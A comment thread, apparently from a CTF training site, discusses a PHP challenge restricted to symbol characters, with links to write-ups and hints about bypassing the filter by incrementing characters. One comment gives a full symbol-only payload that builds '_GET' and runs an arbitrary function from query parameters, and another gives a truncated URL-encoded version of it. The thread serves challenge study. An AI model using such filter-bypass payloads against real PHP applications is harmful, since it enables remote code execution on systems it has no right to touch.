以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501
难,为了难而难
参考:https://blog.csdn.net/qq_36292543/article/details/136623586
自增绕过,最后的payload可以在burp里进行对特殊字符的url编码
不做了,本地构建的脑瓜子刺挠,点跟蚊香去
$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);
大败而归┭┮﹏┭┮
code=%24_%3D(%EF%BC%90%2F%EF%BC%90)._%3B%24_%3D%24_%5B''%3D%3D'%24'%5D%3B%24_%2B%2B%3B%24__%3D%24_%2B%2B%3B%24__%3D%24_%2B%2B.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D'_'.%24__.(%24_%2B%2B).%24_%3B%24
小白表示根本不会做啊,网上也搜不到教程TAT
能用的ascii字符 : !$'()+,./;=[]_ ,使用自增运算
...
评论
modeng 25天前
举报
以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501
hutiaan 1月前
举报
难,为了难而难
不懂就问 2月前
举报
参考:https://blog.csdn.net/qq_36292543/article/details/136623586
不会编程的崽 2月前
举报
自增绕过,最后的payload可以在burp里进行对特殊字符的url编码
xiaoxiao972521 2月前
举报
不做了,本地构建的脑瓜子刺挠,点跟蚊香去
Daniel2023 3月前
举报
$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);
treasure11 4月前
举报
大败而归┭┮﹏┭┮
viabytsai 4月前
举报
code=%24_%3D(%EF%BC%90%2F%EF%BC%90)._%3B%24_%3D%24_%5B''%3D%3D'%24'%5D%3B%24_%2B%2B%3B%24__%3D%24_%2B%2B%3B%24__%3D%24_%2B%2B.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D'_'.%24__.(%24_%2B%2B).%24_%3B%24
2694109361 5月前
举报
小白表示根本不会做啊,网上也搜不到教程TAT
blackjack009 6月前
举报
能用的ascii字符 : !$'()+,./;=[]_ ,使用自增运算